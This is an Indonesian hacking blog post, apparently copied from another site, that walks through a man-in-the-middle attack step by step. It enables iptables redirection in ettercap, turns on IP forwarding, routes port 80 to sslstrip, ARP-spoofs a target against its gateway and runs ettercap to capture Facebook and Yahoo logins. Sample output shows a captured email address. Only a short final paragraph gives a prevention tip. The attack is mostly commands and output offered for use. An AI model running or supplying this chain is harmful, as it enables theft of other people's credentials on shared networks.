- Sudah banyak artikel di ilmuhacking yang membahas teknik serangan man in the middle (mitm), namun belum pernah saya menjelaskan secara detil tentang apa itu mitm attack. Mitm attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat.
Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.
Kali ini saya akan lebih fokus ke Sniffing (snifer) Siapkan :
1. Kopi Cappucino, Rokok Sampoerna (Bagi yang merokok hehehhehehe), n Koneksi Jaringan dengan kecepatan 1 Gbp/s
2. Edit File /etc/etter.conf
root@th3-d0rk# kwrite /etc/etter.conf
Cari bagian ini
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Kemudian Hilangkan tanda # seperti ini :
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3. Aktifkan IP Forward
root@th3-d0rk#echo 1 > /proc/sys/net/ipv4/ip_forward
Redirect port 80 ke port 10000 (sslstrip)
root@th3-d0rk# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4. Ok sekarang jalankan ArpSpoofing
Contoh :
Target : 192.168.2.105
Gateway : 192.168.2.244
root@th3-d0rk# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244
6. Kemudian Jalankan SSLSTRIP
root@th3-d0rk# sslstrip -a -k -f
7. Ok langkah Terakhir Jalankan ettercap
root@th3-d0rk# ettercap -T -q -i wlan0
Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
root@th3-d0rk# ettercap -T -q -i wlan0
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0...
(Ethernet) wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.63.181.26:80 -> USER: toovix07@yahoo.com PASS: (rahasia )
INFO: http://www.facebook.com/login.php?ap...id=10000119039
Tips Pencegahan Serangan mitm dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif.
Sekian Dulu yah jangan lupa comment :-)
Sumber : Norphil.com
Pengunjung Yang Baik Selalu Meninggalkan Komentar